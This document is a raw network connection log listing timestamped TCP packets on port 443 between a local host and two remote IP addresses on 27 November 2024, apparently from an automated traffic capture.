                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:38.322976112 CET49755443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:38.323129892 CET49755443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:38.323143005 CET4434975513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:38.917973042 CET49738443192.168.2.1052.149.20.212
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:38.918013096 CET4434973852.149.20.212192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:38.918029070 CET49738443192.168.2.1052.149.20.212
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:38.918036938 CET4434973852.149.20.212192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:38.975579977 CET4434975013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:38.976233959 CET49750443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:38.976264000 CET4434975013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:38.978354931 CET49750443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:38.978368998 CET4434975013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.044117928 CET4434974913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.044585943 CET49749443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.044612885 CET4434974913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.045141935 CET49749443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.045147896 CET4434974913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.205091953 CET44349754172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.205215931 CET49754443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.206428051 CET49754443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.206439018 CET44349754172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.206685066 CET44349754172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.217252016 CET49754443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.217364073 CET49754443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.217387915 CET44349754172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.217466116 CET49754443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.217480898 CET44349754172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.225248098 CET4434975113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.225778103 CET49751443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.225802898 CET4434975113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.226289034 CET49751443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.226299047 CET4434975113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.417148113 CET4434975013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.417231083 CET4434975013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.417315006 CET49750443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.417592049 CET49750443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.417592049 CET49750443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.417610884 CET4434975013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.417619944 CET4434975013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.420593977 CET49756443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.420633078 CET4434975613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.420723915 CET49756443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.420893908 CET49756443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.420907021 CET4434975613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.490081072 CET4434974913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.490161896 CET4434974913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.490360975 CET49749443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.490391970 CET49749443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.490407944 CET4434974913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.490418911 CET49749443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.490425110 CET4434974913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.493071079 CET49757443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.493120909 CET4434975713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.493202925 CET49757443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.493347883 CET49757443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.493365049 CET4434975713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.674206972 CET4434975313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.675383091 CET49753443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.675391912 CET4434975313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.675856113 CET49753443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.675859928 CET4434975313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.680099010 CET4434975113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.680166006 CET4434975113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.680289984 CET49751443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.680411100 CET49751443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.680435896 CET4434975113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.680449009 CET49751443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.680455923 CET4434975113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.682873964 CET49758443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.682929039 CET4434975813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.683020115 CET49758443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.683155060 CET49758443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:39.683171034 CET4434975813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:40.129686117 CET4434975313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:40.129760981 CET4434975313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:40.129888058 CET49753443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:40.130201101 CET49753443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:40.130223036 CET4434975313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:40.130290031 CET49753443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:40.130300999 CET4434975313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:40.132719040 CET49759443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:40.132756948 CET4434975913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:40.132842064 CET49759443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:40.132989883 CET49759443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:40.133002996 CET4434975913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:40.173724890 CET4434975513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:40.174242020 CET49755443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:40.174256086 CET4434975513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:40.174741030 CET49755443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:40.174747944 CET4434975513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:40.851581097 CET4434975513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:40.851644993 CET4434975513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:40.851824045 CET49755443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:40.852224112 CET49755443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:40.852224112 CET49755443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:40.852236986 CET4434975513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:40.852257967 CET4434975513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:40.855798960 CET49760443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:40.855839968 CET4434976013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:40.855942011 CET49760443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:40.856147051 CET49760443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:40.856163025 CET4434976013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.205473900 CET4434975613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.206031084 CET49756443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.206063032 CET4434975613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.206523895 CET49756443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.206530094 CET4434975613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.344819069 CET4434975713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.352776051 CET49757443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.352796078 CET4434975713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.353677988 CET49757443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.353682995 CET4434975713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.466592073 CET4434975813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.467190981 CET49758443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.467219114 CET4434975813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.467648029 CET49758443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.467653036 CET4434975813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.651714087 CET4434975613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.651798010 CET4434975613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.651868105 CET49756443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.652074099 CET49756443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.652095079 CET4434975613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.652101040 CET49756443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.652107000 CET4434975613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.654970884 CET49761443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.655011892 CET4434976113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.655091047 CET49761443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.655220985 CET49761443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.655234098 CET4434976113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.802531958 CET4434975713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.802601099 CET4434975713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.802690983 CET49757443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.802858114 CET49757443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.802858114 CET49757443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.802875042 CET4434975713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.802891016 CET4434975713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.805922985 CET49762443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.805970907 CET4434976213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.806040049 CET49762443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.806176901 CET49762443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.806190014 CET4434976213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.833515882 CET44349754172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.833625078 CET44349754172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.833698988 CET49754443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.833830118 CET49754443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.833844900 CET44349754172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.916434050 CET4434975913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.916977882 CET49759443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.917006969 CET4434975913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.917453051 CET49759443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.917458057 CET4434975913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.918639898 CET4434975813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.918723106 CET4434975813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.918790102 CET49758443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.918854952 CET49758443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.918880939 CET4434975813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.918893099 CET49758443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.918901920 CET4434975813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.921870947 CET49763443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.921912909 CET4434976313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.921987057 CET49763443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.922115088 CET49763443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:41.922123909 CET4434976313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:42.628443003 CET49764443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:42.628482103 CET44349764172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:42.628571033 CET49764443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:42.628889084 CET49764443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:42.628915071 CET44349764172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:42.644166946 CET4434976013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:42.644659996 CET49760443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:42.644691944 CET4434976013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:42.645098925 CET49760443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:42.645104885 CET4434976013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.089296103 CET4434976013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.089369059 CET4434976013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.089416981 CET49760443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.089579105 CET49760443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.089591026 CET4434976013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.089598894 CET49760443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.089605093 CET4434976013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.104826927 CET49765443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.104888916 CET4434976513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.104952097 CET49765443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.105417013 CET49765443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.105437040 CET4434976513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.439749002 CET4434976113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.440327883 CET49761443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.440363884 CET4434976113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.440809965 CET49761443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.440815926 CET4434976113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.523813963 CET4434976213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.524408102 CET49762443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.524444103 CET4434976213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.524904966 CET49762443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.524910927 CET4434976213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.708019972 CET4434976313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.708785057 CET49763443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.708803892 CET4434976313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.709264040 CET49763443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.709269047 CET4434976313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.883749962 CET4434976113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.883816957 CET4434976113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.883865118 CET49761443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.884064913 CET49761443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.884084940 CET4434976113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.884093046 CET49761443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.884099007 CET4434976113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.887439013 CET49766443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.887490034 CET4434976613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.887586117 CET49766443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.887801886 CET49766443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.887820005 CET4434976613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.891192913 CET44349764172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.891261101 CET49764443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.892467022 CET49764443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.892477036 CET44349764172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.892759085 CET44349764172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.894009113 CET49764443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.894103050 CET49764443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.894109011 CET44349764172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.971163988 CET4434976213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.971246004 CET4434976213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.971328974 CET49762443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.971537113 CET49762443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.971556902 CET4434976213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.971569061 CET49762443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.971575975 CET4434976213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.974217892 CET49767443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.974253893 CET4434976713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.974354982 CET49767443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.974507093 CET49767443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:43.974519968 CET4434976713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:44.155052900 CET4434976313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:44.155119896 CET4434976313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:44.155246019 CET49763443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:44.155487061 CET49763443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:44.155487061 CET49763443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:44.155507088 CET4434976313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:44.155517101 CET4434976313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:44.158343077 CET49768443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:44.158391953 CET4434976813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:44.158608913 CET49768443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:44.158608913 CET49768443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:44.158651114 CET4434976813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:44.922696114 CET4434976513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:44.936912060 CET49765443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:44.936948061 CET4434976513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:44.937649965 CET49765443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:44.937657118 CET4434976513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:45.367496967 CET4434976513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:45.367567062 CET4434976513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:45.367609978 CET49765443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:45.368104935 CET49765443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:45.368124962 CET4434976513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:45.368136883 CET49765443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:45.368143082 CET4434976513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:45.371958017 CET49769443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:45.371999025 CET4434976913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:45.372065067 CET49769443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:45.372211933 CET49769443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:45.372226000 CET4434976913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:45.611654997 CET4434976613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:45.612445116 CET49766443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:45.612462044 CET4434976613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:45.612901926 CET49766443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:45.612907887 CET4434976613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:45.776518106 CET44349764172.67.160.80192.168.2.10
